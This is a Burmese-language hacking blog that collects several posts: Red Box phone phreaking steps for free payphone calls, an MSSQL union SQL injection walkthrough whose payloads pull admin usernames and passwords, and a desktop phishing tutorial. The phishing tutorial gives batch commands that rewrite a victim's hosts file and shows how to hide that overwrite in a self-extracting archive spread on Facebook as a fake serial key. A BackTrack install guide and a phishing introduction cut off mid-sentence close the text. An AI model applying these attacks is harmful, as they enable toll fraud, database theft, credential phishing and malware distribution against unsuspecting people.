Phreaking ဆိုတာ ကြန္ပ်ဴတာေလ့လာသူေတြ telecommunication system ကိုေလ့လာေနတဲ့သူေတြ ရဲ့ အေလ့အက်င့္ ေပၚမွာ ျဖစ္ေပၚလာတဲ့ စကားလံုးေလးတစ္ခုေပါ့။ ေခတ္ အဆက္ဆက္ ျဖစ္ေပၚလာတဲ့ စကားေလးလဲျဖစ္တယ္။ Kevin Mitnick တို့ ေခတ္ကတည္းက သံုးလာတဲ့ method ေလးေပါ့။ Apple CEO ေဟာင္းတစ္ေယာက္ျဖစ္တဲ့ Steve Wazoniak က လဲ phone phreaking ကို အသံုးျပဳခဲ့ဘူးတယ္လို့လဲၾကားဖူးပါတယ္။ Phone Network vulnerabilities ေတြကို သံုးျပီး phone company ေတြကို hack တယ္ျပီးေတာ့ အလကားသံုးလို့ရေအာင္လုပ္တယ္။
ဒီ method က ကၽြန္ေတာ္တို့ နိုင္ငံေတြမွာေတာ့ နဲနဲခက္မယ္။ စမ္းလို့ေတာ့အဆင္မေျပဘူး။ မိရင္ေတာ့ အင္းစိန္တို့ ထိုးဘို တို့ ကို တန္းေနတာပဲ ။ ဘာေတြဘယ္လိုလုပ္လဲဆိုတာေျပာမယ္ အိုေက အဆင္သင့္ျဖစ္ရင္ စမယ္။
Boxing
Boxing ဆိုတာ နိုင္ငံျခားဇာတ္ကားေတြထဲက ပံုးအနီေရာင္ေလးထဲက ဖုန္းေလးကို Free ေျပာလို့ရေအာင္ Phreak လုပ္တဲ့နည္းေလးေပါ့။Phreaking လုပ္မယ္ဆိုရင္ location က remote location ျဖစ္ဖို့လိုမယ္။ အဲ့မွာ Boxing မွာ Boxes ေတြအမ်ားၾကီး ရွိတယ္။ ျပီးေတာ့ အဲ့Box ေတြကို အေရာင္ေတြနဲ့ သတ္မွတ္တယ္။ Red Box , Blue Box, Beige Box ဆိုျပီးသတ္မွတ္ထားတာတယ္။ အဲ့ထဲမွာမွ Blue Box က နဲနဲေဟာင္းသြားတဲ့ method ျဖစ္သလို နာမည္ၾကီးသြားခဲ့တဲ့ method လဲျဖစ္ပါတယ္။ Red Box ကေတာ့ ယေန့ထက္ထိ local calling ေတြ Pay telephones ေတြက ေန အလကားေျပာလို့ရေအာင္လုပ္လို့ရတယ္။ ဒီ method ကနဲနဲေတာ့စိတ္ဝင္စားဖို့ေကာင္းတယ္ ေနာ္္ဟုတ္တယ္ဟုတ္ ။ ဘယ္လိုဖုန္းအမ်ိဳးအစားေတြမွာ အလုပ္လုပ္မလဲ ဆိုေတာ့ older telephones ေတြမွာ အလုပ္လုပ္ပါတယ္တဲ့ ;D ။
Phreaker ေတြရဲ့ main target telephone အမ်ိဳးအစားေတြကေတာ့ cocots and fortress phone ေတြပဲျဖစ္ပါတယ္။ Cocots ဆိုတာ ဘယ္လို့မ်ိဳးလဲဆိုတာေတြးလိုက္မိပါလိမ့္မယ္။ Cocots ဆိုတာ customer owned, controlled, and operated telephone ေတြျဖစ္ပါတယ္။ တနညး္အားျဖင့္ စီးပြားေရးလုပ္ငန္းတစ္ခု ကေန သူတို့ စီးပြားေရးဧရိယာ ထဲက ဖုန္းခြန္ေဆာင္တဲ့ ရတဲ့ ဖုန္းေတြကို သူတို့က ကိုယ္စားလွယ္ေပးေဆာင္ေပးတဲ့ ဖုန္းအမ်ိဳးအစားေတြေပါ့ Cocots ဆိုတာ။ Cocots ဟုတ္မဟုတ္ဘယ္လိုသိနိုင္လဲ။ Cocots ေတြထဲမွာ Company sticker ေတြကို တစ္ခုလံုးကပ္မထားဘူးေပါ့။ Bell network တို့ At&t တို့လို မ်ိဳူးေပါ့။ ခု ဒီမွာေတာ့ အဲ့ဖုနး္အမ်ိဳးအစားေတြကို သံုးေနတဲ့ ကုမၸဏီ တစ္ခုေပါ့။
Red Box ဘယ္လိုလုပ္မလဲ….။
၁။ yak-bak ဆိုတဲ့ကေလးကစားစ၇ာအရုပ္ေလးေတြရွိတယ္။အဲ့လိုမ်ိဳးေလးတစ္လံုးဝယ္လိုက္မယ္
၂။ ျပီးရင္ tone ေတြကိုအင္တာနက္ကေဒါင္းမယ္။ phreaking software ေတြရွိပါတယ္ winphreak လိုမ်ိဳးေတြေပါ့
၃။ ဒါမွမဟုတ္ရင္ payphone ေတြကေနtones ေလးေတြယူလို့ရပါတယ္။
၄။ Payphone ေတြဆီကို သြား ပိုက္ဆံျပားေလးထည့္လိုက္မယ္။
၅။ ျပီ္းရင္ Digital answering machine နဲ့ number တစ္ခုကိုေခၚလိုက္မယ္။
၆။ ျပီးရင္ answering machine နဲ့ အိမ္ကို ျပန္မယ္ ျပီးရင္ Yak-bak ထဲကို tone ထည့္လိုက္မယ္။
၇။ Yak-bak memory ကို overwrite မျဖစ္ခ်င္ရင္ record button နဲ့ ျဖဳတ္ထားလို္က္ေပါ့။
၈။ ျပီးရင္ Pay phone ရဲ့ mouthpiece ထဲကို Yak-bak က tone ကို ဖြင့္ေပးလိုက္။
၉။ ကဲ Thank you လို့ေျပာသံၾကားလိုက္ရင္ ေပ်ာ္လိုက္ေတာ့။ ဖုန္းကို အမုန္းေျပာလို့ရျပီ။ Tone တစ္ခုက Red box ရဲ့ Vulnerable ျဖစ္ေနတာပါပဲ။
ဒီပို့စ္ေလးဟာ သိသင့္သိထိုက္တဲ့ ဗဟုသုတေလးအေနနဲ့ေရးလိုက္တာပါ။ သံုးလို့မရရင္ေတာင္ သိထားသင့္တယ္ထင္လို့ပါ။ တစ္ခ်ိန္က နာမည္ၾကီးခဲ့တဲ့ နည္းေလး ၊လူ အမ်ားအံ့အားသင့္ေလာက္ေအာင္ အစြမ္းျပနိုင္ခဲ့တဲ့ နည္းေလးျဖစ္ပါတယ္
post by Fortran
copy from ghostarea.net
Friday, July 20, 2012
MSSQL Injection
What is MSSQL?
အိုေခ ဒါဆို Attack လုပ္ပံုစလိုက္ၾကရေအာင္ ..ေရွ႕က Union Select Injection ကို ေရးျပီးသားျဖစ္လို႕ အရမ္းအေသးစိတ္ေတာ့ မရွင္းျပေတာ့ပါဘူး ။ ေရွ႕ ကဟာနားလည္ရင္ ဒီ တစ္ပုဒ္က အခက္အခဲေတာ ့ သိပ္ၾကီးမွာမဟုတ္ပါဘူး ။1.Finding Vulnerability
2.Findng Number of Columns
3.Finding Vulnearble Column
4.Finding MySQL Version
5.Finding Tables in Database
6.Finding Columns
7.Displaying content
8.Cracking the hash
9.Finding Admin Page
1.Finding Vulnerabiltiy
www.site.com ဆိုပါစို႕
www.site.com/index.asp?id=1 ေပါ့
www.site.com/indexp.asp?id=’1 ဆိုရင္
Microsoft OLE DB Provider for ODBC Drivers error ’80040e14′
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression ‘department_id=1024”.
/deptdet.asp, line 122
လို Error တက္လာပါလိမ့္မယ္ ။
2.Finding Number of Columns
ပံုမွန္အတိုင္းပဲ Column အေရအတြက္ ရွာပါမယ္ ။
www.site.com/index.asp?id=1 order by 1–
ဆိုျပီးေပါ့ ။
[error] Microsoft SQL Native Client error ’80040e14′
The ORDER BY position number 5 is out of range of the number of items in the select list.
/showthread.asp, line 9
[/error]
ဒီလို Error မတက္မခ်င္းပါ
www.site.com/index.asp?id=1 order by 11–
မွာ Error တက္တယ္ဆိုပါစို႕ 11 မဟုတ္တဲ့သာမန္ 1,2,3 ထဲမွာ တက္မွာမဟုတ္ပါဘူး ဒါဆို 11 ခုေပါ့ ။
3.Finding the vulneable column
www.site.com/index.asp?id=1 and 1=2 union select 11,22,33,44– ေပါ့
1=2 ဆိုတာ False ျဖစ္ျပီး Error ေပၚေအာင္ ထည့္တဲ့သေဘာပါ id=-1 ဆိုရင္လည္းရပါတယ္ ။ တျခား သေဘာတရားတစ္ခုကို ေျပာျပတဲ့အေနနဲ႕ အသစ္ေျပာင္းေပးတာပါ။
Mysql တုန္းကလိုပဲ Vuln ျဖစ္တဲ့ Column ေပၚပါ့မယ္ ။ 44 ဆိုပါစို႕
ဒါဆို 44 မွာ Mysql Command Execute လုပ္ႏုိင္ပါတယ္ ။
4.Finding MySQL Version
ေရွ႕ကလိုပါပဲ 44 မွာ @@version ဆိုတဲ့ COmmand ကို execute လုပ္ပါ့မယ္
www.site.com/index.asp?id=1 and 1=2 union select 11,22,33,@@version–
Version တက္မယ္ေပါ့ ။
5.Finding the Table Name
Myssql မွာ table_name from information_schema.tables– သံုးပါ့မယ္
www.site.com/index.asp?id=1 and 1=2 UNION SELECT 11,22,33,table_name from information_schema.tables– ေပါ့
ဒါဆို table name တစ္ခု တတ္လာပါလိမ့္မယ့္ ။
vuln ဆိုပါစို႕
ဒါေပမယ့္ ကၽြန္ေတာ္တုိ႕လိုခ်င္တဲ့ User တို႕ Admin တို႕လို Table မ်ိဳးမဟုတ္ပါဘူး ဒီေတာ့ ထပ္ျပီး Try ပါ့မယ္
www.site.com/index.asp?id=1 and 1=2 UNION SELECT 11,22,33,table_name from information_schema.tables where table_name not in (‘vuln’)–
သေဘာကေတာ့ vuln မဟုတ္တဲ့ တျခား Table ေပါ့ ဒါဆို usr လိုဟာမ်ိဳးတက္လာျပီဆုိပါစို႕
6.Finding Column Name
usr Table တက္လာျပီဆိုတဲ့ အဲ့ဒီ့ Table ထဲကေန Column ထုတ္ပါ့မယ္ ။
www.site.com/index.asp?id=1 and 1=2 UNION SELECT 11,22,33,column_name from information_schema.columns where table_name=’usr’–
usr ထဲက Column တက္လာပါ့မယ္ Admin ဆိုပါစို႕
တျခား Admin မဟုတ္တဲ့ Password လို Column မ်ိဳးအလိုရွိေသးတဲ့အတြက္ အေပၚ က Table ခြဲတံုးကလိုပဲ ထပ္ Inject လုပ္ပါ့မယ္ ။
www.site.com/index.asp?id=1 and and 1=2 UNION SELECT 11,22,33,column_name from information_schema.columns where table_name=’usr’ and
column_name not in (‘Admin’)–
ဒီတေခါက္ Password ဆိုတဲ့ Column တက္လာျပီဆုိရင္ ကၽြန္ေတာ္တို႕ Data Inject လုပ္ဖို႕ပဲလိုပါေတာ့တယ္ ။
7.Displaying Content
ခုနက ကၽြန္ေတာ္တို႕မွာ Admin နဲ႕ Password ဆိုတဲ့ Column ႏွစ္ခုရထားပါျပီ ဒါဆုိ ဆက္ပါ့မယ္..
www.site.com/index.asp?id=1 and 1=2 UNION SELECT 11,22,33,Admin from usr–
www.site.com/index.asp?id=1 and 1=2 UNION SELECT 11,22,33,Password from usr–
ဒါဆို Admin နဲ႕ Password တက္လာပါျပီ :-D
က်န္တဲ့ႏွစ္ဆင့္ကေတာ့ အမ်ားၾကီးဆက္ေျပာစရာမလိုေတာ့ မေျပာေတာ့ပါဘူး
posted by negative thunder
copy from ghostarea.net
Wednesday, July 18, 2012
Desktop phishing part:2
Part :1 မွာတတုန္းက ကၽြန္ေတာ္တို႕ xampp နဲ႕ သင့္ computer ကို host ထို္င္ဖို႕ ေျပာခဲ့ပါတယ္……အဲဒီလိုေျပာခဲ့တဲ့ေနရာမွာ xampp ကို အသံုး ျပဳနည္း tutorial ကို မေဖာ္ျပ လိုက္ရပါဘူး ။ ဒီ part:2 မွာၾကေတာ့ host ထိုင္ပံုေတြ ျပီးေတာ့ ကၽြန္ေတာ္ တို႕ host file ေတြကို ျဖန္႕ေ၀ပံုေတြကိုဆက္လက္တင္ျပေပးသြားမွပါ…….။
အရင္ဆံုးအေနနဲ႕ xampp ကိုေဒါင္းလုပ္ခ်ရပါမယ္…..။xampp နဲ႕ လုပ္ထားတဲ့ ဆိုက္ေတြအမ်ားၾကီးရိွသလို ဒါနဲ႕ ပက္သက္ျပီးေတာ့ xploit ေတြအမ်ားၾကီးရိွတယ္…ေနာက္ေတာ့ မွ အလွ်င္းသင့္သလိုေဖာ္ျပေပးမွာျဖစ္ပါတယ္…။
Download
ျပီးရင္ ကၽြန္ေတာ္တို႕ အေနနဲ႕ လြယ္ကူစြာ install လုပ္ႏိုင္ပါတယ္…..
ေနာက္တစ္ဆင့္အေနနဲ႕ သင္ဒီလိုျမင္ရမွာပါ…..။အဲဒီကိုေရာက္သြားရင္ No(1) ကိုႏွိပ္လိုက္ပါ…..။ xampp control panel ကို စတင္ဖို႕ျဖစ္ပါတယ္……။ဒီေနရာမွာ option ေတြ ပါေသးတယ္…..။ပံုေလးကိုၾကည့္လိုက္ပါ….။
အဲဒီလို No(1) option ကိုသြားမယ္ဆိုရင္ control panel ထဲေရာက္သြားလိမ့္မယ္………။
အဲဒီမွာလဲ function ေတြအမ်ားၾကီးပါပါတယ္…..။ Apache, FileZilla , MySql တို႕အျပင္ ေနာက္ထပ္ function ေတြလဲပါ၀င္ပါေသးတယ္…..။ဒီပိုစ့္မွာေတာ့ Apache ကိုပဲသံုးသြားမယ္…..။
ေနာက္တစ္ဆင့္အေနနဲ႕ Apache sever ကိုသံုးဖို႕အတြက္ Start ကိုကလစ္လိုက္ပါ…….။
ျပီးရင္ ဆာဗာ အလုပ္မလုပ္ စမ္းသပ္ၾကည့္ရေအာင္……။
ဘယ္လိုလုပ္ရမလဲဆိုေတာ့ သင့္ browser ဖြင့္ျပီးရင္ local machine address ကို သြားလိုက္ ……(127.0.0.1) ျဖစ္ပါတယ္……အဲဒါကို localhost လို႕လဲေခၚပါတယ္….တကယ္လို႕ sever အလုပ္ လုပ္ရင္အထက္ကအတိုင္း ျမင္ရလိမ့္မယ္……။
ေနာက္တစ္ဆင့္အေနနဲ႕ internet ေပၚမွာအလုပ္မလုပ္စမ္းၾကည့္မယ္…….။သင့္ browser ထဲမွာ Public/External Ip ကို ရိုက္ထည့္လိုက္ အထက္ကပံုအတိုင္းေတြ႕ ျမင္ရပါလိမ့္မယ္…။
ေနာက္တစ္ဆင့္အေနနဲ႕httpd-xamp.conf ဆိုတဲ့ဖိုင္ကိုသြားျပီး ျပဳျပင္ရမွာပါ ….အဲဒီကိုသြားရန္ Drive:\xampp\apache\conf\extra အဲဒီလို path အတိုင္းသြားႏိုင္ပါတယ္.. အဲဒီကိုေရာက္ရင္ Deny from all ကိုရွာျပီးျဖတ္ျပစ္လိုက္ပါ.ျပီးရင္ Ctrl+s ကိုႏွပ္ျပီး ေဆ့လိုက္ပါ…..။ေအာက္မွာပံုေလးနဲ႕ေဖာ္ျပထားတယ္……။
အဲျပီးရင္ သင့္ phishing လုပ္မယ့္ဖိုင္ေတြကို drive:\xampp\htdocs စတဲ့ path အတိုင္းသြားလိုက္ျပီးေတာ့ ေနရာခ်လိုက္…ေျပာခ်င္တာကအဲဒီမွာသြားထည့္လိုက္ေပါ့ဗ်ာ..။
အဲသင့္ဖိုင္ေတြ (သိဳ႕) သင့္ phishing page ေတြ ကိုဘယ္လိုျပန္ၾကည့္ရမလဲဆိုေတာ့http://localhost/anything.html or http://127.0.0.1/anything.html စတဲ့အတိုင္းျဖစ္ပါတယ္….အဆိုပါလင့္ႏွစ္ခုဟာ သင့္စက္ထဲမွာပဲအလုပ္လုပ္မွာပါ…..internet ေပၚမွာစမ္းသပ္ခ်င္တယ္ဆိုရင္
http://xxx.xxx.xxx.xxx/anything.html အဲဒီလိုမ်ိဳး ျပန္ၾကည့္ႏိုင္ပါတယ္…..။ xxx.xxx.xxx.xxx ဆိုတာ သင့္ public IP ျဖစ္ပါတယ္…..။
ကၽြန္ေတာ္တို႕ ခုလို host ထိုင္ျခင္းကို ဆက္မလုပ္ခ်င္ဘူးဆိုရင္ control panel ထဲမွာ ၀င္ေရာက္ျပဳျပင္ႏိုင္ပါတယ္……..။
Filezilla, MySql စတဲ့ function မ်ားပါ၀င္တာေၾကာင့္ မိမိစိတ္တိုင္းက်မိမိလုပ္ႏိုင္ပါတယ္…….ေနာက္ျပီး….no-ip.com လိုဟာမ်ိဳးကို ကိုယ္ညဏ္ရိွသလို အသံုးခ်ႏိုင္ပါတယ္….
ကဲ hsot sever ေတာ့တိုင္ျပီးသြားပါျပီ ေနာက္တံုးအဆင့္ကေတာ့ Modify victim’s host file ျဖစ္ပါတယ္….သာေကာင္းေတြဆီက host ဖိုင္ေတြကို ျပဳျပင္ရမွာပါ……။နည္းႏွစ္နည္းရိွပါတယ္….။တစ္ခုက script ေရးျပီးေတာ့ overwrite လုပ္တာ ေနာက္တစ္ခုက online ေပၚမွာ ျဖန္႕ေ၀တာ…….။Script ေရးတာကလြယ္ပါတယ္…..ေအာက္ေဖၚျပပါ code ေတြကို ကူးျပီးေတာ့ .bat နဲ႕ ေဆံလိုက္ျပီး မိမိသားေကာင္ရဲ႕စက္ထဲမွာ run လိုက္ရံုပါ ပဲ။
echo xxx.xxx.xxx.xxx. www.watever.com >> C:\windows\system32\drivers\etc\hosts
echo xxx.xxx.xxx.xxx watever.com >> C:\windows\system32\drivers\etc\hosts
ဒီေနရာမွာ xxx.xxx.xxx.xxx ဆိုတာ ထံုးစံအတိုင္း မိမိ public Ip ျဖစ္ပါတယ္…….။
ေနာက္တစ္ခုကေတာ့ online ေပၚမွာျဖန္႕ေ၀ျခင္းပါ………။winrar ကိုသံုးမွာပါ…..။အဲဒီထဲက SFX Function ကိုသံုးမွာျဖစ္ပါတယ္……။
အရင္ဆံုးအေနနဲ႕ host file တစ္ခုကို အရင္ဆံုး download ဆြဲလိုက္ပါ…..။
ျပီးရင္ အဲဒီ့ host ဖိုင္ကို မိမိ public Ip ေတြထည့္ျပီးေျပာင္းလိုက္ပါ…….။
xxx.xxx.xxx.xxx ဆိုတာထံုးစံအတိုင္း သင့္ public Ip ျဖစ္ပါတယ္…….။ကဲ
အဲဒီလိုသင့္ host ဖိုင္ကိုျပဳျပင္ေျပာင္းလဲျပီးျပီ ဆိုရင္ rar
ဖိုင္လုပ္လိုက္ရေအာင္.. ..။
ပထမဆံုး အေနနဲ႕ ေအာက္ေဖာ္ျပပါပံုကေတာ့ rar ဖိုင္ျပဳလုပ္ျခင္းျဖစ္ပါတယ္……။
ဒုတိယအဆင့္အေနနဲ႕ create SFX archive ကိုေရြးပါ……။
အဲျပီးရင္အထက္ကအတိုင္း Advanced ထဲသြားလိုက္ျပီးရင္ SFX options ကိုကလစ္လိုက္…..ေအာက္ပါပံုအတိုင္း Box တစ္ခုက်လာလိမ့္မယ္……။
ကၽြန္ေတာ္အရင္အပိုင္ တစ္တုန္းကေျပာခဲ့ပါတယ္……host file ဆိုတာ C:\Windows\System32\drivers\etc\host\ အဲဒီလို path အတိုင္းရိွပါတယ္…….။ဒီလိုဆိုရင္ ကၽြန္ေတာ္တို႕ သားေကာင္ရဲ႕ host file အေပၚမွာ ကၽြန္ေတာ္တို႕ ရဲ႕ host file ကို overwrite ျဖစ္ေအာင္….တစ္ခါတည္းးး…….extract လုပ္ရင္ဖြင့္ခ်မယ့္ path ကိုထည့္သြင္းေပးရမွာပါ……..။ဒီလိုလုပ္ျခင္းျဖင့္ သားေကာင္ဟာ……ခု ကၽြန္ ေတာ္တို႕လုပ္ထားတဲ့ rar ဖိုင္ကို extract လုပ္လိုက္တာနဲ႕ တစ္ခါတည္း…..သူ႕ host file မွာ overwrite လုပ္ျပီးသြားျဖစ္သြားလိမ့္မယ္…။
ျပီးရင္ Modes ထဲသြားျပီးေတာ့ Hide all ကိုေရြးလိုက္ပါ…စိတ္ခ်ရေအာင္လို႕ေလ…..။
ေနာက္ဆံုးလုပ္ေဆာင္ခ်က္အေနနဲ႕ အထက္ေဖၚျပပါပံုအတိုင္း…….Update ထဲကိုသြားျပီး ေဖာ္ျပပါအတိုင္ေရြးလိုက္ပါဦး…..။
ဒီအဆင့္ျပီးရင္ ျပီးျပည့္စံုတဲ့ rar ဖိုင္ေလးရပါျပီ……..။ဒါေလးကို
ကိုယ့္သားေကာင္ေတြအေနနဲ႕ extract
လုပ္ျပီးဖြင့္ခ်ဖို႕ပဲလိုပါတယ္…….။ဒီနည္းကို
ကိုယ္ညဏ္ရိွသေလာက္တျခားေနရာေတြမွာလက္ေတြ႕စမ္းသပ္ႏိုင္ပါတယ္…….။ဥပမာ RAT
လိုဟာမ်ိဳး႕ ျဖန္႕တာေပါ့…….။
ကို္ယ္လုပ္ျပီးသား ဒီ rar ဖိုင္ကို social network (facebook) လိုေနရာမ်ိဳးေတြမွာ က်ယ္ျပန္႕စြာျဖန္႕ေ၀ႏိုင္ပါတယ္………။
ကၽြန္ေတာ္ကေတာ့ serial number လိုလို ဘာလိုလို ေပါ့ လဲလိုမ်ိဳးျဖန္႕တာကပိုေကာင္းမယ္ထင္တာပဲ…..။
SE ေပါ့ ယံုေအာင္လုပ္ျပီေ၀ေပးလိုက္…..ဒီနည္းေလးကေတာ္ေတာ္မိုက္တယ္…..ဗ်….။
တကယ္ေတာ့ကၽြန္ေတာ္လဲေလ့လာဆဲလူတစ္ေယာက္ပါ……ဒါေၾကာင့္ဒီပိုစ့္မွာ အမွားတစ္ခုခု ပါသြားခဲ့ရင္ၾကိဳတင္ေတာင္းပန္ပါတယ္……။
Desktop phishing part 2 ကေတာ့ဒီမွာတင္ျပီးပါျပီ…….။
ေနာက္လဲၾကိဳးစားပါဦးမည္……။
posted by Me
You also see in here
Saturday, July 14, 2012
VMware installation with backtrack5 on Window 7
အခု ကၽြန္ေတာ္တို႕ Backtrack 5 ကို vmware player နဲ႕ window 7 ေပၚမွာတင္ပါမယ္ vmware player / vmware workstation ဆိုျပီး၂မ်ိဳးရိွပါတယ္ သူက linux system မွာလိုပဲ wine နဲ႕တူပါတယ္ သူက OS တစ္ခုေပၚမွာ တစ္ျခား OS တစ္ခုကို run ေပးႏိုင္ပါတယ္….. သူကိုအရင္စက္ထဲ install လုပ္ရေအာင္ပါ ………..ေအာက္ကလင့္မွာသြားျပီးေဒါင္းလိုက္ပါ… https://www.vmware.com/ support and download ထဲမွာသြားျပီး register လုပ္ျပီး free download လုပ္လို႕ရပါတယ္…သူ႕ကိုေတာ့ စက္ထဲ install လုပ္နည္းမေျပာေတာ့ပါဘူး ကြန္ကသိပ္မေကာင္းလို႕ပါ အဲ့ေလာက္ေတာ့လုပ္တတ္မယ္ထင္ပါတယ္ သြင္းျပီးသြားရင္ Vmware player ကိုစျပီး run ပါမယ္ စဖြင့္လိုက္ပါပုံမွာျပထားတဲ့အတိုင္းေပၚလာပါမယ္….:P
Next ကိုႏိွပ္လိုက္ပါ ေနာက္တစ္ပုံကိုၾကည့္ပါ………..
Next ပဲႏိွပ္လိုက္ပါ……..
ျပီးရင္ Next ပဲႏိွပ္လိုက္ပါ……..
Yes လိုက္ပါ ေနာက္ OK ေပါ့…..ေနာက္တစ္ပုံကိုၾကည့္ပါ……….
ကဲ ညာဖက္အေပၚဆုံးက Create New Virtual Machine ကုိႏိွပ္ပါ ေအာက္ကပုံအတိုင္းက်လာပါလိမ့္မယ္……….:P
အဲ့မွာ ဘယ္ေနရာကေန guest operating system ကို install လုပ္မလဲေမးေနပါတယ္ အဲ့ေတာ့ ကၽြန္ေတာ္တို႕ကေခြကေနေမာင္းတင္မလား စက္ထဲက Iso ဖိုင္ကေနတစ္ဆင့္ေမာင္း တင္မလားေရြးရပါမယ္ အဆင္ေျပတဲ့ေနရာကေနေရြးေပးလိုက္ေပါ့ေနာ္ ကၽြန္ေတာ္ကေတာ့ CD:Drive ကေနေမာင္းတင္ပါမယ္……..ေနာက္တစ္ပုံကိုၾကည့္ပါ…………:P
အဲ့ေနာက္ ကိုတင္မွာ system ကိုေရြးေပးရပါမယ္….အခုကၽြန္ေတာ္တို႕က Linux system ကိုတင္မွာပါ Linux ကိုေရြးေပးပါေနာက္ ေအာက္မွာ Ubuntu ကိုေရြးေပးလိုက္ပါ ဘာလို႕လဲ ဆိုေတာ့ Backtrack က Ubuntu Base ျဖစ္လို႕ပါ…………အေပၚကပုံမွာျပထားပါတယ္အဲ့အတိုင္းေရြးျပီးရင္ Next ကိုႏိွပ္ပါ……………:P
နာမည္ေပးလိုက္ပါ အခု Backtrack ကိုတင္တာဆိုေတာ့ BT 5 R2 ေပါ့ အဲ့လိုေပးျပီး Next ႏိွပ္လိုက္ပါ………………..:P
ေနာက္သူ႕ကိုဘယ္ေလာက္ space ေပးမလဲေပါ့ ကို္ယ္စက္ရဲ႕space အေနအထားကိုလုိက္ျပီးေပးလိုက္ပါကၽြန္ေတာ္ကေတာ့ 20GB ေပးထားပါတယ္ေနာက္ Split virtual disk into Multiple files ကိုေရြးေပးျပီး Next ကိုႏိွပ္လို္က္ပါ………..:P
ကိုယ့္စက္ကဘယ္ေလာက္ Hardware ကိုသုံးမလဲဆိုတာသူျပပါလိမ့္မယ္ ကိုယ္ကျပင္ခ်င္တယ္ဆိုရင္ Customize Hardware ကိုႏိွပ္ျပီးစိတ္ၾကိဳက္ျပင္ႏိုင္ပါတယ္ ေနာက္ Finish ကိုႏိွပ္ ပါ………
သူဟာသူ install လုပ္ျပီးတက္လာပါလိမ့္မယ္…….ပုံမွာၾကည့္ပါ…….
Enter ႏိွပ္လို္က္ပါ Defult username: က root ပါ password က toor ပါ ေနာက္ startx လို႕ command ေပးျပီး၀င္ႏိုင္ပါတယ္…………………….:P
အသုံးျပဳပုံအားလုံးကတူတူပါပဲ အခုက window 7 ေပၚမွာတင္ျပီအသုံးျပဳလုိ႕ရပါတယ္စမ္းျပီးသုံးၾကည့္ပါ ကိုယ့္ကိုစိတ္တိုင္းက်ျပီဆိုမွာ Dual Boot နဲ႕တင္ျပီးသုံးပါ အၾကံေပးတာပါ အားလုံးက linux ဆိုရင္ေၾကာက္ၾကပါတယ္ ဘာမွန္းလဲမသိဘူးဘာျဖစ္တယ္ညာျဖစ္တယ္ေပါ့ အခုလိုတင္ျပီးသုံးၾကည့္လိုက္ပါ ၾကိဳက္တယ္အဆင္ေျပႏိုင္တယ္ဆိုမွာ တင္သုံးပါ အၾကံ ေပးတာပါ ေက်းဇူးတင္ပါတယ္ ေအာ္ ၾကားထဲမွာ ခ်န္ခဲ့တဲ့ဟာေတြရိွပါေသးတယ္ အဲ့ဒါက Next ေတြ ပဲႏိွပ္ရမွာမိုလို႕မေျပာေတာ့ပါဘူး………ဆက္လက္ၾကိဳးစားပါအုံးမယ္ေက်းဇူးတင္ပါတယ္
မွတ္ခ်က္။ ။ဒီပိုစ့္အတြက္ ကၽြန္ေတာ့္သူငယ္ခ်င္း မူရင္းေရးတဲ့သူျဖစ္တဲ့ negative thunder ကိုေက်းဇူး တင္ပါတယ္.....။သူၾကိဳးစားထားတာကို ကၽြန္ေတာ္ျပန္လည္ကူးယူေဖာ္ျပေပးလိုက္တာပါ...။
Desktop Phishing Part I : Introduction & Attacking Theory
Introduction
ကၽြန္ေတာ္တို႕ႏိုင္ငံမွာရိွတဲ့ လူမ်ားအေနနဲ႕ Phishing method ကိုအေတာ္မ်ားမ်ားသိရိွၾကမယ္လို႕ယူဆပါတယ္….။ကၽြန္ေတာ္ကို္ယ္တိုင္လဲ Tutorial ေတြေရးခဲ့ဘူးပါတယ္…။ဒါေပမယ့္လူတိုင္းသိၾကတာတစ္ခုကေတာ့ Phishing ကို method တစ္မ်ိဳးအေနနဲ႕သာသိရိွခဲ့ ၾက ပါတယ္…။Phishing ဆိုတဲ့ေနရာမွာ method ေပါင္းအမ်ိဳးခြဲ မ်ားစြာရိွ ေသးတယ္ဆိုတာ ကို သိရိွသူေတာ္ေတာ္နည္းပါတယ္…။ (မွတ္ခ်က္။ ။ေနာက္ ၾကမွပိုစ့္တစ္ပုဒ္အေနနဲ႕ေရးေပးပါ့မယ္)……….။ ေနာက္ျပီးေတာ့ Phishing ကိုလူေတာ္ေတာ္မ်ားမ်ားက အထင္ေသးတတ္ၾကပါေသးတယ္..။ ေနာက္ျပီးေတာ့ phishing ဆိုတာကို နည္းနည္းေတာ့ထပ္ေျပရပါလိမ့္မယ္…။ Phishing ဆိုတာ…Hacker ေတြဟာ Duplicate page လို႕ေခၚတဲ့ အစစ္အတိုင္း ပြားယူထားေသာ (မိတၱဴ) web စာမ်က္ႏွာမ်ားကို ျပဳလုပ္ျပီး သာေကာင္မ်ားရဲ႕ အခ်က္အလက္ (password) မ်ားကို လိမ္လည္လွည့္ ျဖား ယူေဆာင္ျခင္း ျဖစ္ပါတယ္…။ ဒါေပမယ့္ ဒီပိုစ့္မွာအေျခခံသေဘာတရာေတြကို ရွင္းျပမေနေတာ့ပဲ…….method တစ္ခုျဖစ္တဲ့ Desktop phishing အ ေၾကာင္းကိုပဲရွင္းလင္ေရးသာသြားမွာပါ..။
အရင္က အေျခခံ phishing method သေဘာတရားေတြအရ ကၽြန္ေတာ္ တို႕ဟာမိမိ သားေကာင္ရဲ႕ Password ေတြရဖို႕ web hosting တစ္ခုျပဳ လုပ္ျပီးရင္ဖိုင္ေတြတင္ ျပီးရင္ မိမိရဲ႕ duplicate page ဗတြကို သားေကာင္ေတြဆီကို ေရာက္ေအာင္တစ္နည္းနည္းျဖင့္ ပို႕လြတ္ရပါတယ္…။ ဒီလိုနဲ႕ သားေကာင္ေတြဆီကေန အယုံ သြင္ျဖားေယာင္းျပီးေတာ့ Data ေတြကို လိမ္လည္ ရယူခဲ့ၾကပါတယ္…။ ဒါေပမယ္ဒီနည္းလမ္းဟာ အေျခံခံ ဗဟုသုတ ရိွတဲ့သားေကာင္ေတြ ေတာင္မွ အလြယ္တကူ ရိပ္မိ သိရိွႏိုင္ပါတယ္….။ အဲေနာက္ပိုင္းမွာေတာ့ hacker ေတြဟာသူတို႕ URL ေတြကို မရိပ္မိေအာင္ လို႕ URL shortener ေတြကို အသံုးျပဳလာၾကပါတယ္…။ဘယ္လိုပဲ ေဖ်ာက္ဖ်က္ လိမ္ညာေပမယ္ သားေကာင္ အနည္းစု ကိုသာ လွည့္ျဖားႏိုင္ ခဲ့ ၾက ပါတယ္…။ဒီလိုနဲ႕ နည္းလမ္းတစ္ခ်ိဳ႕ ကိုထြင္ ၾကရင္းနဲ႕ Desktop phishing 